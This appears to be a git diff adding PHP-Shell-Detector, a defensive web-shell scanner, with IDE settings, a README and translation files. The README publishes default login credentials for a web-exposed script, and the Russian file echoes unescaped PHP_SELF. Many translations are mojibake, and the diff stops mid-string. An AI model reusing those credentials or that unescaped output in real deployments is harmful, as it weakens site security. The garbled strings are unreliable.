diff --git a/doc/PHP-Shell-Detector-master/.project b/doc/PHP-Shell-Detector-master/.project new file mode 100644 index 0000000000000000000000000000000000000000..af207be078a4d440db2d6ee760d98bda39e50f4a --- /dev/null +++ b/doc/PHP-Shell-Detector-master/.project @@ -0,0 +1,17 @@ +<?xml version="1.0" encoding="UTF-8"?> +<projectDescription> + <name>PHP-Shell-Detector-master</name> + <comment></comment> + <projects> + </projects> + <buildSpec> + <buildCommand> + <name>org.eclipse.wst.validation.validationbuilder</name> + <arguments> + </arguments> + </buildCommand> + </buildSpec> + <natures> + <nature>org.eclipse.wst.jsdt.core.jsNature</nature> + </natures> +</projectDescription> diff --git a/doc/PHP-Shell-Detector-master/.settings/.jsdtscope b/doc/PHP-Shell-Detector-master/.settings/.jsdtscope new file mode 100644 index 0000000000000000000000000000000000000000..cca691f6cc02795a223f6b2dad78f86480ed88ff --- /dev/null +++ b/doc/PHP-Shell-Detector-master/.settings/.jsdtscope @@ -0,0 +1,7 @@ +<?xml version="1.0" encoding="UTF-8"?> +<classpath> + <classpathentry kind="con" path="org.eclipse.wst.jsdt.launching.JRE_CONTAINER"/> + <classpathentry kind="con" path="org.eclipse.wst.jsdt.launching.baseBrowserLibrary"/> + <classpathentry kind="src" path=""/> + <classpathentry kind="output" path=""/> +</classpath> diff --git a/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.container b/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.container new file mode 100644 index 0000000000000000000000000000000000000000..49c8cd4f14a391fdb178f9dfbf869238642b1501 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.container @@ -0,0 +1 @@ +org.eclipse.wst.jsdt.launching.JRE_CONTAINER \ No newline at end of file diff --git a/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.name b/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.name new file mode 100644 index 0000000000000000000000000000000000000000..11006e2a545afb3c2e4150dd8553048b785370ce --- /dev/null +++ b/doc/PHP-Shell-Detector-master/.settings/org.eclipse.wst.jsdt.ui.superType.name @@ -0,0 +1 @@ +Global \ No newline at end of file diff --git a/doc/PHP-Shell-Detector-master/README.md b/doc/PHP-Shell-Detector-master/README.md new file mode 100644 index 0000000000000000000000000000000000000000..2da17a387e798b71b845f89fee7f527699a83a55 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/README.md @@ -0,0 +1,95 @@ +Web Shell Detector +================== +<img src="http://www.emposha.com/wp-content/uploads/2011/07/shelldetect3-300x201.png" width="100" align="left" style="padding-right: 4px;" /> Web Shell Detector – is a php script that helps you find and identify php/cgi(perl)/asp/aspx shells. Web Shell Detector has a “web shells†signature database that helps to identify “web shell†up to 99%. By using the latest javascript and css technologies, web shell detector has a light weight and friendly interface. + +Web Shell Detector is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> + +Console version (python): https://github.com/emposha/Shell-Detector + + +Contributors +------------ +Piotr Åuczko + +John Thornton + +Detection +--------- + + Number of known shells: 604 + +Requirements +------------ +PHP 5.x, OpenSSL (only for secure file submission) + +Usage +----- +To activate Web Shell Detector: + +1) Upload shelldetect.php and shelldetect.db to your root directory + +2) Open shelldetect.php file in your browser + + Example: http://www.website.com/shelldetect.php + +3) Use default username & password + + Username: admin + Password: protect + +4) Inspect all strange files, if some of files look suspicious, send them to http://www.shelldetector.com team. After submitting your file, it will be inspected and if there are any threats, it will be inserted into a “web shell detector†web shells signature database. + +5) If any web shells found and identified use your ftp/ssh client to remove it from your web server (IMPORTANT: please be careful because some of shells may be integrated into system files!). + +Demo +---- + + http://www.emposha.com/demo/shelldetect/ + +Options +------- + - extension - extensions that should be scanned + - showlinenumbers - show line number where suspicious function used + - dateformat - used with access time & modified time + - langauge - if I want to use other language + - directory - scan specific directory + - task - perform different task + - report_format - used with is_cron(true) file format for report file + - is_cron - if true run like a cron(no output) + - filelimit - maximum files to scan (more then 30000 you should scan specific directory) + - useget - activate _GET variable for easy way to recive tasks + - authentication - protect script with user & password in case to disable simply set to NULL + - remotefingerprint - get shells signatures db by remote + + +Changelog +--------- + + - 1.66 thanks to John Thornton for small tweeks and php 5.3.3 support + + - 1.64 settings ini file support added(in case that you want to use same settings without code changing), output method rewriten, is_cron fixed, italian translation added (thanks to Marco Saiu) + + - 1.63 new shell recognize mechanizm added, shell signatures updated. + + - 1.62 version of jquery reverted to 1.7.x due bug with jquery ui dialog, new type of files added, shells signatures updated + + - 1.61 added new way to send suspicious files, some css & code fixes, new shells signatures added + + - 1.6 added support to indicate not shell files (but still those files need to be removed), loader indicator added + + - 1.52 noindex meta tag added (to remove script from search results), scann all files options added: extension = * + + - 1.51 unpack function update + + - 1.5 unpack function added, application version check added, many warnings fixed, error handler fixed. + + - 1.4 hide suspicious files option added, file scanning changed. + + - 1.3 submission of suspicious file to shelldetector.com changed, email field added with ability to get notify about suspicious file. + + - 1.2 encryption function added, authentication added, some small bugs fixed + + - 1.1 fingerprint function change + show line regex changed + + - 1.0 first version diff --git a/doc/PHP-Shell-Detector-master/lang/chinese.php b/doc/PHP-Shell-Detector-master/lang/chinese.php new file mode 100644 index 0000000000000000000000000000000000000000..6488697eff248b74044929e0b5f4bc882aec1dc9 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/lang/chinese.php @@ -0,0 +1,50 @@ +<?php + $local = array(); + $local['Please login to continue.'] = '请登录åŽç»§ç»ã€‚'; + $local['Shells signature database updated succesfully!'] = 'Shell ç¾åæ•°æ®åº“æ›´æ–°æˆåŠŸï¼'; + $local['Cant save shells signature database please check permissions'] = 'ä¸èƒ½ä¿å˜ shell ç¾åæ•°æ®åº“,请检查æƒé™ã€‚'; + $local['Your shells signatures database already updated!'] = '您的 shell ç¾åæ•°æ®åº“å·²ç»æ›´æ–°ï¼'; + $local['New version of application found. Please update!'] = 'å‘现新版本的程åºã€‚请更新ï¼'; + $local['Cant connect to server! Application version check failed!'] = 'æ— æ³•è¿žæŽ¥åˆ°æœåŠ¡å™¨ï¼ç¨‹åºç‰ˆæœ¬æ£€æŸ¥å¤±è´¥ï¼'; + $local['New version of shells signature database found. Please update!'] = 'å‘现新版本的 shell ç¾åæ•°æ®åº“。请更新ï¼'; + $local['Cant connect to server! Version check failed!'] = 'æ— æ³•è¿žæŽ¥åˆ°æœåŠ¡å™¨ï¼ç‰ˆæœ¬æ£€æŸ¥å¤±è´¥ï¼'; + $local['You code submited. Thank you.'] = '您的代ç å·²æ交。éžå¸¸æ„Ÿè°¢ã€‚'; + $local['Cant find selected file.'] = '未找到选择的文件。'; + $local['No file specified.'] = '未指定文件。'; + $local['Starting file scanner, please be patient file scanning can take some time.'] = '开始扫æ文件,请è€å¿ƒç‰å¾…,这需è¦èŠ±ä¸€äº›æ—¶é—´ã€‚'; + $local['Number of known shells in database is: '] = 'æ•°æ®åº“ä¸å·²çŸ¥çš„ shell æ•°é‡ï¼š'; + $local['Files found:'] = 'å·²å‘现的文件:'; + $local['File limit reached, scanning process stopped.'] = '已达到文件上é™ï¼Œæ‰«æ进程已åœæ¢ã€‚'; + $local['File scan done, we have: @count files to analize'] = '文件扫æ已完æˆï¼šå·²åˆ†æž @count 个文件'; + $local['Please note suspicious files information will not be displayed'] = '请注æ„:å¯ç–‘文件信æ¯ä¸èƒ½æ˜¾ç¤ºã€‚'; + $local['Show sha for file:'] = '显示文件的 sha 值:'; + $local['Full path:'] = '完整路径:'; + $local['Sha1:'] = 'Sha1:'; + $local['please note it`s a malicious file not a shell'] = '请注æ„:它是一个æ¶æ„文件,ä¸æ˜¯ shell。'; + $local['please note potentially dangerous file (legit file but may be used by hackers)'] = '请注æ„潜在的å±é™©æ–‡ä»¶ï¼ˆåˆæ³•çš„文件,但å¯èƒ½è¢«é»‘客利用)'; + $local['Fingerprint:'] = '指纹:'; + $local['Positive, it`s a '] = '实际上,它是一个 '; + $local['suspicious functions used:'] = '使用的å¯ç–‘函数:'; + $local['line:'] = 'è¡Œå·ï¼š'; + $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>状æ€</strong>:已å‘现 @count 个å¯ç–‘æ–‡ä»¶ä»¥åŠ @shells 个 shell'; + $local['Negative'] = 'ä¸ç¡®å®šçš„'; + $local['if wrong'] = '如果有误'; + $local['submit file for analize'] = 'æ交文件以分æž'; + $local['Submit file'] = 'æ交文件'; + $local['Your email'] = '您的 Email'; + $local['(in case you want to be notified):'] = '(å¦‚æžœä½ æƒ³èŽ·å¾—é€šçŸ¥):'; + $local['Suspicious behavior found in:'] = 'å‘现å¯ç–‘行为于:'; + $local['Please note: file have different owner'] = '请注æ„:文件属于ä¸åŒçš„所有者'; + $local['Please note: file have full access permissions'] = '请注æ„:文件具有完全访问æƒé™'; + $local['Owner:'] = '所有者:'; + $local['Permission:'] = 'æƒé™ï¼š'; + $local['Last accessed:'] = '最åŽè®¿é—®æ—¶é—´ï¼š'; + $local['Last modified:'] = '最åŽä¿®æ”¹æ—¶é—´ï¼š'; + $local['MD5 hash:'] = 'MD5 哈希值:'; + $local['Filesize:'] = '文件大å°ï¼š'; + $local['Please wait'] = '请ç¨å€™...'; + $local['Done, report file created'] = '完æˆï¼ŒæŠ¥å‘Šæ–‡ä»¶å·²åˆ›å»º'; + $local['Error, report file creation failed'] = '错误,报告文件创建失败'; + $local['<strong>Error: </strong>'] = '<strong>错误:</strong>'; + $local[' line: '] = 'è¡Œå·ï¼š'; +?> diff --git a/doc/PHP-Shell-Detector-master/lang/french.php b/doc/PHP-Shell-Detector-master/lang/french.php new file mode 100644 index 0000000000000000000000000000000000000000..f4c4260c9b66ba3531f2618217590641a7c50dcd --- /dev/null +++ b/doc/PHP-Shell-Detector-master/lang/french.php @@ -0,0 +1,46 @@ +<?php + $local = array(); + $local['Please login to continue.'] = 'Merci de vous authentifier pour continuer.'; + $local['Shells signature database updated succesfully!'] = 'Base de signatures mise à jour avec succès !'; + $local['Cant save shells signature database please check permissions'] = 'Impossible d\'enregistrer la nouvelle version de la base de signatures. Vérifiez les permissions.'; + $local['Your shells signatures database already updated!'] = 'Votre base de signatures est déjà à jour !'; + $local['New version of application found. Please update!'] = 'Une nouvelle version de l\'application a été trouvée. Merci de mettre à jour !'; + $local['Cant connect to server! Application version check failed!'] = 'Impossible de se connecter au serveur, la vérification de version de l\'application a échouée.'; + $local['New version of shells signature database found. Please update!'] = 'Une nouvelle version de la base de signatures a été trouvée. Merci de mettre à jour !'; + $local['Cant connect to server! Version check failed!'] = 'Impossible de se connecter au serveur, la vérification de la version a échouée.'; + $local['You code submited. Thank you.'] = 'Votre code a été soumis. Merci.'; + $local['Cant find selected file.'] = 'Impossible de trouver le fichier sélectionné.'; + $local['No file specified.'] = 'Aucun fichier spécifié.'; + $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Démarrage du scanner de fichiers, cela peut prendre du temps..'; + $local['Number of known shells in database is: '] = 'Nombre de signatures connues dans la base :'; + $local['Files found:'] = 'Fichiers trouvés :'; + $local['File limit reached, scanning process stopped.'] = 'Limite de fichiers atteinte, scan interrompu.'; + $local['File scan done, we have: @count files to analize'] = 'Le scan est terminé. Il y a @count fichiers à analyser.'; + $local['Please note suspicious files information will not be displayed'] = 'Notez que les informations des fichiers suspicieux ne seront pas affichées.'; + $local['Show sha for file:'] = 'SHA1 du fichier :'; + $local['Full path:'] = 'Chemin complet :'; + $local['Sha1:'] = 'SHA1 :'; + $local['please note it`s a malicious file not a shell'] = 'Notez qu\'il s\'agit d\'un fichier malicieux, mais pas un shell.'; + $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Notez qu\'il s\'agit d\'un fichier potentiellement dangereux (légitime mais pouvant être utilisé par des pirates)'; + $local['Fingerprint:'] = 'Fingerprint :'; + $local['Positive, it`s a '] = 'Positif, c\'est un '; + $local['suspicious functions used:'] = 'Fonctions suspicieuses :'; + $local['line:'] = 'ligne :'; + $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Statut</strong>: @count fichiers suspicieux trouvés et @shells shells trouvés'; + $local['Negative'] = 'Négatif'; + $local['if wrong'] = 'si faux'; + $local['submit file for analize'] = 'Soumettre un fichier à une analyse'; + $local['Submit file'] = 'Soumettre le fichier'; + $local['Your email'] = 'Votre email'; + $local['(in case you want to be notified):'] = '(dans le cas où vous voudriez être notifié):'; + $local['Suspicious behavior found in:'] = 'Élément suspect trouvé dans :'; + $local['Owner:'] = 'Propriétaire :'; + $local['Permission:'] = 'Permissions :'; + $local['Last accessed:'] = 'Dernier accès :'; + $local['Last modified:'] = 'Dernière modification :'; + $local['MD5 hash:'] = 'Hash MD5 :'; + $local['Filesize:'] = 'Taille :'; + $local['Please wait'] = 'Patientez...'; + $local['<strong>Error: </strong>'] = '<strong>Erreur :</strong>'; + $local[' line: '] = ' ligne :'; +?> diff --git a/doc/PHP-Shell-Detector-master/lang/german.php b/doc/PHP-Shell-Detector-master/lang/german.php new file mode 100644 index 0000000000000000000000000000000000000000..f95eaf730b891138421bfe7161982f9f619d1ad5 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/lang/german.php @@ -0,0 +1,46 @@ +<?php + $local = array(); + $local['Please login to continue.'] = 'Bitte einloggen, um fortzufahren.'; + $local['Shells signature database updated succesfully!'] = 'Shell-Signaturen in Datenbank erfolgreich aktualisiert!'; + $local['Cant save shells signature database please check permissions'] = 'Kann Shell-Signaturen nicht in Datenbank speichern. Bitte prüfen Sie die Schreib-Berechtigung'; + $local['Your shells signatures database already updated!'] = 'Ihre Shell-Signatur-Datenbank wurde bereits aktualisiert!'; + $local['New version of application found. Please update!'] = 'Neue Programm-Version gefunden. Bitte aktualisieren!'; + $local['Cant connect to server! Application version check failed!'] = 'Verbindung zum Server nicht möglich! Prüfung der Programm-Version fehlgeschlagen!'; + $local['New version of shells signature database found. Please update!'] = 'Neue Shell-Signatur-Datenbank gefunden. Bitte aktualisieren!'; + $local['Cant connect to server! Version check failed!'] = 'Verbindung zum Server nicht möglich! Prüfung der Datenbank-Version fehlgeschlagen!'; + $local['You code submited. Thank you.'] = 'Ihr Programm-Code wurde übertragen. Vielen Dank.'; + $local['Cant find selected file.'] = 'Ausgewählte Datei kann nicht gefunden werden.'; + $local['No file specified.'] = 'Keine Datei ausgewählt.'; + $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Starte Datei-Scanner. Bitte haben Sie Gedult, dies kann einen Moment dauern.'; + $local['Number of known shells in database is: '] = 'Anzahl bekannter Shell-Befehle in der Datenbank:'; + $local['Files found:'] = 'Gefundene Dateien:'; + $local['File limit reached, scanning process stopped.'] = 'Datei-Limit ereicht, Scan-Prozess angehalten.'; + $local['File scan done, we have: @count files to analize'] = 'Datei-Scan durchgeführt, es gibt: @count zu analysierende Dateien'; + $local['Please note suspicious files information will not be displayed'] = 'Bitte beachten Sie, dass Inhalte verdächtiger Dateien nicht angezeigt werden'; + $local['Show sha for file:'] = 'Zeige Sha für die Datei:'; + $local['Full path:'] = 'Relativer Pfad:'; + $local['Sha1:'] = 'Sha1:'; + $local['please note it`s a malicious file not a shell'] = 'Bitte beachten: es handelt sich um eine schädliche Datei, nicht um einen Shell-Befehl.'; + $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Bitte beachten: potentiell schädliche Datei (ggf. ein Original, aber möglicherweise durch Hacker eingespeist)'; + $local['Fingerprint:'] = 'Fingerabdruck:'; + $local['Positive, it`s a '] = 'Positiv, es ist ein '; + $local['suspicious functions used:'] = 'Verdächtige Funktionen:'; + $local['line:'] = 'Zeile:'; + $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Status</strong>: @count verdächtige Dateien gefunden und @shells ungewöhnliche Shell-Befehle gefunden'; + $local['Negative'] = 'Negativ'; + $local['if wrong'] = 'falls falsch,'; + $local['submit file for analize'] = 'übermittle Datei für Analyse'; + $local['Submit file'] = 'Datei übertragen'; + $local['Your email'] = 'Ihre Email-Adresse'; + $local['(in case you want to be notified):'] = '(für den Fall, dass Sie informiert werden möchten):'; + $local['Suspicious behavior found in:'] = 'Ungewöhnliches Verhalten gefunden in:'; + $local['Owner:'] = 'Eigentümer:'; + $local['Permission:'] = 'Berechtigung:'; + $local['Last accessed:'] = 'Letzter Aufruf:'; + $local['Last modified:'] = 'Letzte Bearbeitung:'; + $local['MD5 hash:'] = 'MD5-Hash:'; + $local['Filesize:'] = 'Dateigröße:'; + $local['Please wait'] = 'Bitte warten'; + $local['<strong>Error: </strong>'] = '<strong>Fehler: </strong>'; + $local[' line: '] = ' Zeile: '; +?> diff --git a/doc/PHP-Shell-Detector-master/lang/italian.php b/doc/PHP-Shell-Detector-master/lang/italian.php new file mode 100644 index 0000000000000000000000000000000000000000..a5574401d73f59fd1851cf8882aba086975cfd5c --- /dev/null +++ b/doc/PHP-Shell-Detector-master/lang/italian.php @@ -0,0 +1,52 @@ +<?php + $local = array(); + $local['Please login to continue.'] = 'Perfavore esegui l\'accesso per continuare'; + $local['Shells signature database updated succesfully!'] = 'Il database delle shell ` stato aggiornato con successo!'; + $local['Cant save shells signature database please check permissions'] = 'Non è possibile salvare il database controlla i permessi'; + $local['Your shells signatures database already updated!'] = 'Il database delle shell è già aggiornato!'; + $local['New version of application found. Please update!'] = 'È stata trovata una nuova versione dell\'applicazione. Perfavore procedi con l\'aggiornamento!'; + $local['Cant connect to server! Application version check failed!'] = 'Non è possibile connettersi al server! Il controllo della versione è fallito!'; + $local['New version of shells signature database found. Please update!'] = 'È stata trovata una nuova versione del database. Perfavore procedi con l + +\'aggiornamento!'; + $local['Cant connect to server! Version check failed!'] = 'Non è possibile connettersi al server! Il controllo della versione è fallitto!'; + $local['You code submited. Thank you.'] = 'Il codice è stato inviato. Grazie.'; + $local['Cant find selected file.'] = 'Non è stato trovato il file selezionato'; + $local['No file specified.'] = 'Nessun file speficiato'; + $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Avvio dell\'analisi dei file, si prega di attendere la scansione può + +richiedere diverso tempo.'; + $local['Number of known shells in database is: '] = 'Numero di shell conosciute nel database: '; + $local['Files found:'] = 'File trovati:'; + $local['File limit reached, scanning process stopped.'] = 'Il limite dei file è stato raggiunto, la scansione è stata interrota.'; + $local['File scan done, we have: @count files to analize'] = 'La scansione dei file è stata effettuata, abbiamo: @count file da analizzare'; + $local['Please note suspicious files information will not be displayed'] = 'Si prega di notare le informazioni dei file sospetti non verranno visualizzati'; + $local['Show sha for file:'] = 'Mostra sha per file:'; + $local['Full path:'] = 'Percorso Completo:'; + $local['Sha1:'] = 'Sha1:'; + $local['please note it`s a malicious file not a shell'] = 'si prega di notare questo è un file sospetto non una shell'; + $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'vi prego di notare questo file è potenzialmente pericoloso (file + +legittimo, ma può essere utilizzato dagli hacker)'; + $local['Fingerprint:'] = 'Impronta:'; + $local['Positive, it`s a '] = 'Positivo, è una '; + $local['suspicious functions used:'] = 'Funzione sospetta:'; + $local['line:'] = 'linea:'; + $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Stato</strong>: Trovati @count file sospetti e @shells shell'; + $local['Negative'] = 'Negativo'; + $local['if wrong'] = 'se sbagliato'; + $local['submit file for analize'] = 'Invia file per l\'analisi'; + $local['Submit file'] = 'Invia file'; + $local['Your email'] = 'Tua email'; + $local['(in case you want to be notified):'] = '(Se vuoi essere informato):'; + $local['Suspicious behavior found in:'] = 'Elemento sospetto trovato in:'; + $local['Owner:'] = 'Proprietario:'; + $local['Permission:'] = 'Permessi:'; + $local['Last accessed:'] = 'Ultimo accesso:'; + $local['Last modified:'] = 'Ultima modifica:'; + $local['MD5 hash:'] = 'MD5 hash:'; + $local['Filesize:'] = 'Dimensione:'; + $local['Please wait'] = 'Attendere'; + $local['<strong>Error: </strong>'] = '<strong>Errore:</strong>'; + $local[' line: '] = 'linea:'; +?> \ No newline at end of file diff --git a/doc/PHP-Shell-Detector-master/lang/pt_BR.php b/doc/PHP-Shell-Detector-master/lang/pt_BR.php new file mode 100644 index 0000000000000000000000000000000000000000..83f715849ee6342f3b418d82f8622c823aeff492 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/lang/pt_BR.php @@ -0,0 +1,46 @@ +<?php +  $local = array(); +  $local['Please login to continue.'] = 'Por favor, faça o login para continuar.'; +  $local['Shells signature database updated succesfully!'] = 'A sua base de assinaturas foi atualizada com sucesso !'; +  $local['Cant save shells signature database please check permissions'] = 'Não foi possÃvel salvar a nova versão da sua base de assinaturas. Verifique as permissões.'; +  $local['Your shells signatures database already updated!'] = 'A sua base de assinaturas já está na última versão!'; +  $local['New version of application found. Please update!'] = 'Nova versão da aplicação foi encontrada. Favor atualizar !'; +  $local['Cant connect to server! Application version check failed!'] = 'ImpossÃvel se conectar ao servidor ! A checagem de versão do aplicativo falhou !'; +  $local['New version of shells signature database found. Please update!'] = 'Nova versão da base de assinaturas foi encontrada. Por favor atualize !'; +  $local['Cant connect to server! Version check failed!'] = 'ImpossÃvel se conectar ao servidor ! A verificação de versão falhou!'; +  $local['You code submited. Thank you.'] = 'Seu código foi enviado. Obrigado. '; +  $local['Cant find selected file.'] = 'ImpossÃvel achar o arquivo selecionado.'; +  $local['No file specified.'] = 'Não foi especificado um arquivo. '; +  $local['Starting file scanner, please be patient file scanning can take some time.'] = 'Iniciando o escaneamento dos arquivos, tenha um pouco de paciência pois o processo levará algum tempo ... '; +  $local['Number of known shells in database is: '] = 'Número de assinaturas desta base de assinaturas :'; +  $local['Files found:'] = 'Arquivos encontrados :'; +  $local['File limit reached, scanning process stopped.'] = 'Limite de arquivos atingido. O processo de escaneamento foi interrompido.'; +  $local['File scan done, we have: @count files to analize'] = 'O escaneamento dos arquivos terminou e temos @count arquivos a analisar.'; +  $local['Please note suspicious files information will not be displayed'] = 'Atenção pois as informações dos arquivos suspeitos não serão mostradas.'; +  $local['Show sha for file:'] = 'SHA1 do ficheiro :'; +  $local['Full path:'] = 'Caminho completo para o arquivo :'; +  $local['Sha1:'] = 'SHA1 :'; +  $local['please note it`s a malicious file not a shell'] = 'Atenção este é um arquivo malicioso, mas não é um shell .'; +  $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Atenção este arquivo é potencialmente perigoso ( pode ser um arquivo legÃtimo mas ele pode ser usado por hackers )'; +  $local['Fingerprint:'] = 'Fingerprint :'; +  $local['Positive, it`s a '] = 'Positivo, isto é '; +  $local['suspicious functions used:'] = 'Funções suspeitas :'; +  $local['line:'] = 'linha :'; +  $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Status</strong>: @count arquivos suspeitos encontrados e @shells encontrados '; +  $local['Negative'] = 'Negativo'; +  $local['if wrong'] = 'se há erros'; +  $local['submit file for analize'] = 'Envie o arquivo para análise'; +  $local['Submit file'] = 'Envie o arquivo'; +  $local['Your email'] = 'Seu e-mail'; +  $local['(in case you want to be notified):'] = '(caso você queira ser notificado):'; +  $local['Suspicious behavior found in:'] = 'Elemento suspeito encontrado em :'; +  $local['Owner:'] = 'Proprietário :'; +  $local['Permission:'] = 'Permissões :'; +  $local['Last accessed:'] = 'Último acesso :'; +  $local['Last modified:'] = 'Última modificação :'; +  $local['MD5 hash:'] = 'Hash MD5 :'; +  $local['Filesize:'] = 'Tamanho do arquivo:'; +  $local['Please wait'] = 'Por favor aguarde...'; +  $local['<strong>Error: </strong>'] = '<strong>Erro :</strong>'; +  $local[' line: '] = ' linha :'; +?> diff --git a/doc/PHP-Shell-Detector-master/lang/russian.php b/doc/PHP-Shell-Detector-master/lang/russian.php new file mode 100644 index 0000000000000000000000000000000000000000..526d0acb0f4f3043cd02144a5120a42c452e0e32 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/lang/russian.php @@ -0,0 +1,50 @@ +<?php + $local = array(); + $local['Please login to continue.'] = 'ПожалуйÑта, авторизуйтеÑÑŒ прежде чем начать.'; + $local['Shells signature database updated succesfully!'] = 'Базы Ñигнатур уÑпешно обновлены!'; + $local['Cant save shells signature database please check permissions'] = 'Ðе удаетÑÑ Ñохранить баху Ñигнатур. ПожалуйÑта, проверьте права на запиÑÑŒ.'; + $local['Your shells signatures database already updated!'] = 'Ваши базы Ñигнатур уже были обновлены!'; + $local['New version of application found. Please update!'] = 'Ðайдена Ð½Ð¾Ð²Ð°Ñ Ð²ÐµÑ€ÑÐ¸Ñ Ð¿Ñ€Ð¾Ð³Ñ€Ð°Ð¼Ð¼Ñ‹. ПожалуйÑта, обновитеÑÑŒ!'; + $local['Cant connect to server! Application version check failed!'] = 'Проверка обновлений Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð½Ðµ удалаÑÑŒ. Ðет ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ Ñ Ñервером.'; + $local['New version of shells signature database found. Please update!'] = 'Ваша база Ñигнатур уÑтарела. ПожалуйÑта, обновитеÑÑŒ!'; + $local['Cant connect to server! Version check failed!'] = 'Проверка обновлений Ñигнатур не удалаÑÑŒ. Ðет ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ Ñ Ñервером.'; + $local['You code submited. Thank you.'] = 'Ваш код отправлен, ÑпаÑибо.'; + $local['Cant find selected file.'] = 'Выбранный файл не найден.'; + $local['No file specified.'] = 'Ðе выбран файл.'; + $local['Starting file scanner, please be patient file scanning can take some time.'] = 'ÐачалоÑÑŒ Ñканирование файлов. ПожалуйÑта, подождите. Ðто может занÑÑ‚ÑŒ неÑколько минут.'; + $local['Number of known shells in database is: '] = 'ЧиÑло извеÑтных Ñигнатур шеллов:'; + $local['Files found:'] = 'Ðайдено файлов'; + $local['File limit reached, scanning process stopped.'] = 'ДоÑтигнут лимит кол-ва файлов файлов. Сканирование оÑтановлено.'; + $local['File scan done, we have: @count files to analize'] = 'Сканирование файлов завершено. Ðайдно @count файлов Ð´Ð»Ñ Ð°Ð½Ð°Ð»Ð¸Ð·Ð°'; + $local['Please note suspicious files information will not be displayed'] = 'Ð˜Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð¾ подозрительных файлах не будет отображена'; + $local['Show sha for file:'] = 'Показать SHA файла:'; + $local['Full path:'] = 'Полный путь:'; + $local['Sha1:'] = 'Sha1:'; + $local['please note it`s a malicious file not a shell'] = 'Обратите внимание на Ñтот файл. Он может быть инфицирован.'; + $local['please note potentially dangerous file (legit file but may be used by hackers)'] = 'Обратите внимание на Ñтот файл, он может быть иÑпользован хакерами.'; + $local['Fingerprint:'] = 'Сигнатура:'; + $local['Positive, it`s a '] = 'Ðайдено Ñовпадение, Ñто '; + $local['suspicious functions used:'] = 'иÑпользуютÑÑ Ð¿Ð¾Ð´Ð¾Ð·Ñ€Ð¸Ñ‚ÐµÐ»ÑŒÐ½Ñ‹Ðµ функции:'; + $local['line:'] = 'Ñтрока:'; + $local['<strong>Status</strong>: @count suspicious files found and @shells shells found. <a href="' . $_SERVER['PHP_SELF'] . '?s=1">Rescan and show suspicious files</a>'] = '<strong>СтатуÑ</strong>: найдено @count подозрительных файлов. Ðайдено @shells шеллов. <a href="' . $_SERVER['PHP_SELF'] . '?s=1">ЗапуÑтить Ñканирование заново и показать подозрительные файлы.</a>'; + $local['Negative'] = 'Совпадений не найдено.'; + $local['if wrong'] = 'еÑли файл определен ошибочно'; + $local['submit file for analize'] = 'отправьте файл на анализ'; + $local['Submit file'] = 'Отправить файл'; + $local['Your email'] = 'Ваш email'; + $local['(in case you want to be notified):'] = '(в Ñлучае, еÑли Ð’Ñ‹ хотите получить уведомление):'; + $local['Suspicious behavior found in:'] = 'Подозрительный код в:'; + $local['Please note: file have different owner'] = 'Обратите внимание: у файла другой владелец'; + $local['Please note: file have full access permissions'] = 'Обратите внимание: файл имеет полние права доÑтупа'; + $local['Owner:'] = 'Владелец:'; + $local['Permission:'] = 'Права:'; + $local['Last accessed:'] = 'Дата доÑтупа:'; + $local['Last modified:'] = 'Дата модификации:'; + $local['MD5 hash:'] = 'MD5 хеш:'; + $local['Filesize:'] = 'Размер файла:'; + $local['Please wait'] = 'ПожалуйÑта, подождите...'; + $local['Done, report file created'] = 'Завершено. Файл отчета Ñоздан'; + $local['Error, report file creation failed'] = 'Ошибка ÑÐ¾Ð·Ð´Ð°Ð½Ð¸Ñ Ñ„Ð°Ð¹Ð»Ð° отчета'; + $local['<strong>Error: </strong>'] = '<strong>Ошибка:</strong>'; + $local[' line: '] = ' Ñтрока: '; +?> diff --git a/doc/PHP-Shell-Detector-master/lang/spanish.php b/doc/PHP-Shell-Detector-master/lang/spanish.php new file mode 100644 index 0000000000000000000000000000000000000000..d8daa8ec33365aa481d6499f5b0e0a251c0ffd87 --- /dev/null +++ b/doc/PHP-Shell-Detector-master/lang/spanish.php @@ -0,0 +1,50 @@ +<?php + $local = array(); + $local['Please login to continue.'] = 'Por favor inicie sesion para continuar。'; + $local['Shells signature database updated succesfully!'] = 'La base de datos ha sido actualizadaï¼'; + $local['Cant save shells signature database please check permissions'] = 'No se puede guardar actualizar la base de datos, por favor revise los permisos de escritura。'; + $local['Your shells signatures database already updated!'] = 'La base de datos ya ha sido actualizada previamenteï¼'; + $local['New version of application found. Please update!'] = 'Hay una nueva version de la aplicacion, Por favor actualizeï¼'; + $local['Cant connect to server! Application version check failed!'] = 'No se puede conectar al servidor, La comprovacion de la version de la aplicacion a falladoï¼'; + $local['New version of shells signature database found. Please update!'] = 'Una nueva version de la base de datos a sido encontrada, por favor aactualizeï¼'; + $local['Cant connect to server! Version check failed!'] = 'No se puede conectar al servidor, La comprovacion de la version de la aplicacion a falladoï¼'; + $local['You 